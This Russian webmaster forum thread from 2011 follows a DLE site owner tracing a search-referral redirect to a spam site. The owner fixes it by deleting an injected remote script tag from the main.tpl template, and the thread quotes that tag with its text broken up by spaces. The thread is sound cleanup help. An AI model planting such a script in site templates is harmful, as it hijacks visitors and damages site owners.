Редирект всех поисковых переходов
Страницы: 1
Редирект всех поисковых переходов
Я сначала подумал, что метрика опять тупит, но и ЛИ показывает заметное снижение поисковых переходов (падение примерно в 300 раз smile:) ). Проблема в том, что по непонятным мне причинам при переходе на сайт с любой поисковой системы каким то образом перебрасывается на другой сайт. Причем ладно бы на нормальный сайт перекидывало, а там на какую-то ошибку природы с нулем в графе проиндексированных Гуглом страниц. Скорее всего это скрипт каким-то волшебным образом попал либо в index.php, либо в main.tpl. Я с редиректом никогда не работал, поэтому прошу совета: что мне вообще искать и где?
Мой сайт: _http://fifa-tournament.ru/ (кстати с прямого захода редирект не работает - только с поисковиков)
Сайт редиректа: _http://shara.searchlots-all.ru (при переходе, получается примерно такое: _http://shara.searchlots-all.ru/results.php?notds=1&query=%D0%A2%D1%83%D1%80%D0%BD%D0%B8%D1%80%D1%8B%20%D0%BF%D0%BE%20FIFA )
Движок: DLE
Изменено: hich_nick - 3 Июля 2011 18:28

Бесплатная контекстная реклама

С ПС попробывал перейти,все отлично переходит. Посмотри файл host свой,может чтото там, и только у тебя так. smile:confused:
Цитата
DEMON1705 пишет:
С ПС попробывал перейти,все отлично переходит

Не может быть только у меня. Позавчера было 300+ переходов с ПС, а сегодня 3 (и то только с google/images). Страницы на месте, да и не могли меня забанить в один день Гугл, Яндекс, Маил и даже Нигма smile:mocking:

Цитата
DEMON1705 пишет:
Посмотри файл host свой,может чтото там, и только у тебя так

Можно по-подробнее, где его найти?
hich_nick, у вас редиректит при переходе с Гугл и Яндекса (значит с любой известной ПС). Читайте эту тему, там такая же ситуация, как у Вас:

Код
http://www.cy-pr.com/forum/f21/t9393/


hosts тут совершенно не при чем
Изменено: hebroid - 3 Июля 2011 18:40
Цитата
hebroid пишет:
hich_nick , у вас редиректит при переходе с Гугл и Яндекса (значит с любой известной ПС). Читайте эту тему, там такая же ситуация, как у Вас:
Код
http://www.cy-pr.com/forum/f21/t9393/

Спасибо, почитаю.
Крабик, спасибо за ссылочу. Удалил из main.tpl вот такую вещь: "<sc ript src=ht tp://promed iagroup.ru/d. js></scr ipt>" и все стало впорядке.

А нет, теперь в подвале выскакивает ошибка: "Fatal error: Call to a member function return_links() on a non-object in АДРЕСФТП/public_html/index.php(271) : eval()'d code on line 1023"
Изменено: hich_nick - 3 Июля 2011 19:16
и что теперь делать? main.tpl насколько я понял это один из файлов темы. Может тогда найти эту тему и скопировать оттуда main.tpl?

Ничего же не выскакивает...исправили?
Изменено: hebroid - 3 Июля 2011 19:55
Цитата
hebroid пишет:
Ничего же не выскакивает...исправили?

Да, исправил. Спасибо, крабик smile;)
Доброе слово и хеадкрабу приятно smile:o
Изменено: hebroid - 3 Июля 2011 20:05
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
22:05 Непонятные ссылки на сайт 
22:04 Что за странные внешние ссылки? 
21:35 Снова появились дубли в Яндексе 
21:13 Яндекс тИЦ 03.12.2016 
20:56 Апдейт Яндекса 09.12.2016 
20:16 Закрывать или индексировать категории? 
19:03 Яндекс музыка 
22:04 Требуется журналист на порно сайт 
22:04 Требуется создать лого и фавикон на сайт 
21:49 Прогон по Реально Трастовым сайтам и форумам. Постоянное обновление. 
21:33 Продам хороший, доходный сайт с ТИЦ 40 
20:37 Микроразметка под google 
20:04 Создание модулей, хаков для DLE (Data Life Engine), веб разработка. 
19:47 Комплексная раскрутка сайтов. Качественные услуги, прогоны и прочее. (2000+ отзывов) 
22:14 Про счетчики 
18:10 Способ навсегда удалить рефспам из аналитики. 
16:02 Палю убойную тему - раскрутка групп ВК. Супер метод! Налетай! 
11:17 Больше всего видеороликов смотрят на основе социальной сети "Одноклассники" 
11:08 Мелкие эксперименты 
00:08 Книга "Просветление за полчаса" 
23:31 1000+ уников в сутки на странице ВКонтакте за 2 недели - мануал